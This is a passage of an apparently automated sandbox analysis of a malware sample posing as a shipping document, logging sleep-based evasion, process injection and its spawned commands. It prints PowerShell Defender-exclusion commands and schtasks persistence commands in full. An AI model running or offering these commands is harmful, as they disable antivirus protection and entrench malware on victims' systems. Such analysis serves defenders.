                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -595562s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -595453s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -595344s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -595219s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -595109s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -595000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -594890s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -594781s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -594671s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uyDicX.exe TID: 2164Thread sleep time: -594562s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 599766Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 599641Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 599531Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 599422Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 599312Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 599203Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 599094Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 598985Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 598860Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 598735Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 598610Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 598485Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 598360Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 598235Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 598110Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 597985Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 597860Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 597735Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 597610Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 597485Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 597360Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 597235Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 597110Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 596985Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 596860Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 596735Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 596610Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 596485Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 596360Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 596235Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 596110Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 595985Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 595860Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 595735Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 595610Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 595485Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 595360Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 595235Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 595100Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 594985Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 594860Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 594735Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 594610Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 594485Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 594360Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 594235Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 594110Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeThread delayed: delay time: 593985Jump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 599891
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 599781
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 599672
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 599562
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 599453
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 599343
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 599234
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 599124
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 599015
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 598906
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 598797
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 598687
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 598578
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 598469
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 598359
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 598250
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 598140
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 598030
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 597922
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 597808
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 597703
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 597573
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 597469
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 597359
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 597250
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 597141
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 597031
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 596922
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 596808
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 596703
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 596583
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 596453
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 596343
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 596234
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 596125
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 596015
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 595906
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 595780
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 595672
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 595562
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 595453
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 595344
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 595219
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 595109
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 595000
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 594890
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 594781
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 594671
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeThread delayed: delay time: 594562
                Source: HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002D84000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd5e665588b960<
                Source: HBL NO C-ACC-250002.exe, 00000009.00000002.4498141381.0000000000EA5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllurat
                Source: uyDicX.exe, 0000000E.00000002.4499608217.0000000003002000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd5e7c51370503<
                Source: uyDicX.exe, 0000000E.00000002.4497161472.0000000000E97000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 9_2_05097B70 LdrInitializeThunk,9_2_05097B70
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe"
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uyDicX.exe"
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe"Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uyDicX.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeMemory written: C:\Users\user\AppData\Roaming\uyDicX.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe"Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uyDicX.exe"Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uyDicX" /XML "C:\Users\user\AppData\Local\Temp\tmp61D1.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess created: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uyDicX" /XML "C:\Users\user\AppData\Local\Temp\tmp6EB2.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeProcess created: C:\Users\user\AppData\Roaming\uyDicX.exe "C:\Users\user\AppData\Roaming\uyDicX.exe"Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeQueries volume information: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
